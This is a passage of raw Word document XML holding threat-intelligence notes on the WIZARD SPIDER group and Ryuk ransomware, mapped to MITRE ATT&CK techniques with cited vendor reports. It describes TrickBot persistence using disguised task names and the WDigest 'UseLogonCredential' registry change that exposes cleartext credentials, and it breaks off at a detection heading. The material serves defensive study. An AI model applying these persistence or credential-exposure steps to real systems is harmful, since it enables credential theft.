          <w:p w14:paraId="558033EA" w14:textId="011F4329" w:rsidR="00187965" w:rsidRPr="005B41A3" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32548B70" w14:textId="23D6FDFD" w:rsidR="00187965" w:rsidRPr="005B41A3" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Added to tidy Markov transition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BD5123F" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="0077286F" w:rsidRDefault="00392096" w:rsidP="00392096"/>
    <w:p w14:paraId="1829F0FA" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="00C94979" w:rsidRDefault="00392096" w:rsidP="00392096"/>
    <w:p w14:paraId="59A21D5C" w14:textId="3B4D3A46" w:rsidR="008F1B7B" w:rsidRPr="008F1B7B" w:rsidRDefault="008F1B7B" w:rsidP="008F1B7B">
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1566.001 Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5F014A" w14:textId="51E224B7" w:rsidR="001358D1" w:rsidRPr="00E7418F" w:rsidRDefault="00E7418F" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId191" w:history="1">
        <w:r w:rsidR="001358D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">What is </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="001358D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ryuk</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="001358D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Ransomware? The Complete Breakdown (crowdstrike.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E7418F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7418F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E7418F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E7418F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001F691A">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2019] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2750FF" w14:textId="5AA9270B" w:rsidR="00E7418F" w:rsidRDefault="00E7418F" w:rsidP="001358D1">
      <w:r w:rsidRPr="00E7418F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="006C2E7B">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId192" w:history="1">
        <w:r w:rsidR="001F691A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Timelining GRIM SPIDER's Big Game Hunting Tactics | CrowdStrike</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001F691A">
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A3D97" w14:textId="4FCA5ACA" w:rsidR="001F691A" w:rsidRDefault="001F691A" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId193" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">A Bazar </w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>start</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: How one hospital thwarted a </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ryuk</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> ransomware outbreak (redcanary.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2109E0CF" w14:textId="5C5D231B" w:rsidR="000D10D1" w:rsidRPr="00E7418F" w:rsidRDefault="000D10D1" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId194" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>WizardSpider_TLPWHITE_v.1.4.pdf (prodaft.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022] (via Google “</w:t>
      </w:r>
      <w:r w:rsidRPr="000D10D1">
        <w:t xml:space="preserve">wizard spider </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D10D1">
        <w:t>ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D10D1">
        <w:t xml:space="preserve"> actual attacks</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB4AD04" w14:textId="77777777" w:rsidR="006F4F24" w:rsidRDefault="006F4F24" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475F36DF" w14:textId="7A0C217E" w:rsidR="006F4F24" w:rsidRDefault="006F4F24" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4F24">
        <w:t xml:space="preserve">WIZARD SPIDER is a sophisticated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F4F24">
        <w:t>eCrime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F4F24">
        <w:t xml:space="preserve"> group that has been operating the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F4F24">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F4F24">
        <w:t xml:space="preserve"> ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4F24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This actor is a Russia-based criminal group</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4F24">
        <w:t xml:space="preserve"> known for the operation of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F4F24">
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F4F24">
        <w:t xml:space="preserve"> banking malware that had focused primarily on wire fraud in the past.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DE618" w14:textId="11AAE26F" w:rsidR="0094754D" w:rsidRDefault="0094754D" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve"> ransom note is written to a file named RyukReadMe.txt. A number of different </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>ransom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve"> note templates have been observed. The body of the template is static with the exception of the email address and the Bitcoin (BTC) wallet address, which may change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD835B" w14:textId="2DA64D4B" w:rsidR="0094754D" w:rsidRDefault="0094754D" w:rsidP="001358D1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve">Based on observed transactions to known </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve"> BTC addresses, the ransom demand varies significantly. This suggests that WIZARD SPIDER (like INDRIK SPIDER with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>BitPaymer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>) calculates the ransom amount based on the size and value of the victim organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFF449" w14:textId="1E0B7FC7" w:rsidR="0094754D" w:rsidRDefault="0094754D" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve">CrowdStrike Falcon Intelligence™® believes that the initial compromise is performed through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>, which is typically distributed either via spam email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve">or, through the use of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094754D">
        <w:t>Emotet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094754D">
        <w:t xml:space="preserve"> (developed and operated by MUMMY SPIDER) geo-based download function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A31A459" w14:textId="7A1ABB05" w:rsidR="006029DC" w:rsidRDefault="00691E0D" w:rsidP="006029DC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId195" w:history="1">
        <w:r w:rsidR="006029DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>MUMMY SPIDER (Threat Actor) (fraunhofer.de)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006029DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006029DC">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006029DC">
        <w:t>Malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006029DC">
        <w:t xml:space="preserve"> KB on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006029DC">
        <w:t>Mumy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006029DC">
        <w:t xml:space="preserve"> Spider )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85A1D4" w14:textId="17FC028C" w:rsidR="00456E6D" w:rsidRDefault="00691E0D" w:rsidP="006029DC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId196" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00456E6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Emotet</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00456E6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> - Wikipedia</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B81FFB9" w14:textId="77777777" w:rsidR="006E4803" w:rsidRDefault="006E4803" w:rsidP="006E4803">
      <w:r>
        <w:t>[2] Initial Access and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA75AC" w14:textId="40D3769C" w:rsidR="006E4803" w:rsidRDefault="006E4803" w:rsidP="006E4803">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">While the use of malicious attachments in spam emails is the most common initial access vector — determined across multiple CrowdStrike investigations — the available data from these investigations had either been removed or “aged off” the systems (i.e., dispersed due to the passage of time) before CrowdStrike Services could confirm the source. In cases where spam attachments could be verified — once a user has opened the attachment and enabled macro functionality </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005B109C">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="005B109C" w:rsidRPr="005B109C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005B109C" w:rsidRPr="005B109C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> User Execution: Malicious File</w:t>
      </w:r>
      <w:r w:rsidR="005B109C">
        <w:t xml:space="preserve">  ) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— a PowerShell script </w:t>
      </w:r>
      <w:r w:rsidR="007D5BB5">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="007D5BB5" w:rsidRPr="007D5BB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.001 : &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="007D5BB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5BB5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">downloads either </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Emotet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bokbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trickbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, with the end payload being </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Within hours of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> being executed, additional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modules are installed for network reconnaissance and credential theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358E0C1F" w14:textId="77777777" w:rsidR="00957B66" w:rsidRDefault="00957B66" w:rsidP="00957B66">
      <w:r>
        <w:t>[2] Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2573D08A" w14:textId="2908242E" w:rsidR="00957B66" w:rsidRDefault="00957B66" w:rsidP="00957B66">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trickbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is installed as a scheduled task</w:t>
      </w:r>
      <w:r w:rsidR="00436EE9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00436EE9">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00436EE9" w:rsidRPr="00436EE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1053.005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00436EE9" w:rsidRPr="00436EE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
      <w:r w:rsidR="00436EE9">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r>
        <w:t>, using names like “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinDotNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,” “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoogleTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,” or “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysnetsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to masquerade as legitimate-appearing processes</w:t>
      </w:r>
      <w:r w:rsidR="00436EE9">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="00436EE9" w:rsidRPr="00CF04C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036.004 : Masquerading: Masquerade Task or Service</w:t>
      </w:r>
      <w:r w:rsidR="00436EE9">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. These point to various copies of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> installed in the system, usually within the user profile under %USER_DIR%\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Roaming\ or a subdirectory. The subdirectories also use similarly misleading names like “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinDefrag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” or “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” to appear innocuous. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> may also be installed as a service with names like “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ControlServiceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” that points to a copy in the system drive root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F82C98" w14:textId="77777777" w:rsidR="00CF04C1" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:r>
        <w:t>[2] Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DB3303" w14:textId="503C5F8F" w:rsidR="00CF04C1" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module used for credential harvesting is pwgrab64. As with all modules launched by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> core, pwgrab64 is installed into a subfolder, usually named either “modules” or “data,” and modified the following registry value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3840B0A3" w14:textId="77777777" w:rsidR="00CF04C1" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Registry Key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5400C" w14:textId="77777777" w:rsidR="00CF04C1" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>HKLM\System\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityProviders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WDigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E36D63D" w14:textId="77777777" w:rsidR="00CF04C1" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Value: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UseLogonCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3559D735" w14:textId="3F38C925" w:rsidR="00CF04C1" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Data: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D191BE" w14:textId="7015C9D3" w:rsidR="00CF04C1" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Setting the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UseLogonCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” value to “1” configures the Windows operating system to store credentials as cleartext in memory, where they can then be retrieved via the use of credential dumping tools </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="001563EA" w:rsidRPr="001563EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1555.004</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001563EA" w:rsidRPr="001563EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials from Password Stores: Windows Credential Manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ). Older versions of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwgrab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a limited scope that targets mail clients, web browsers, FileZilla and WinSCP. Newer versions also dump passwords for applications such as PuTTY, VNC and RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6713F85A" w14:textId="0502372E" w:rsidR="00957B66" w:rsidRDefault="00CF04C1" w:rsidP="00CF04C1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the investigations reviewed by CrowdStrike Services, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UseLogonCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> registry value was observed having been set to “1” on systems throughout the infrastructure, often in conjunction with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TrickBot’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> first deployment to the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B9EA7" w14:textId="09C3A509" w:rsidR="00182791" w:rsidRDefault="00182791" w:rsidP="00182791">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[3] Detection opportunities 2 and 3 “Enumerating domain trusts with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
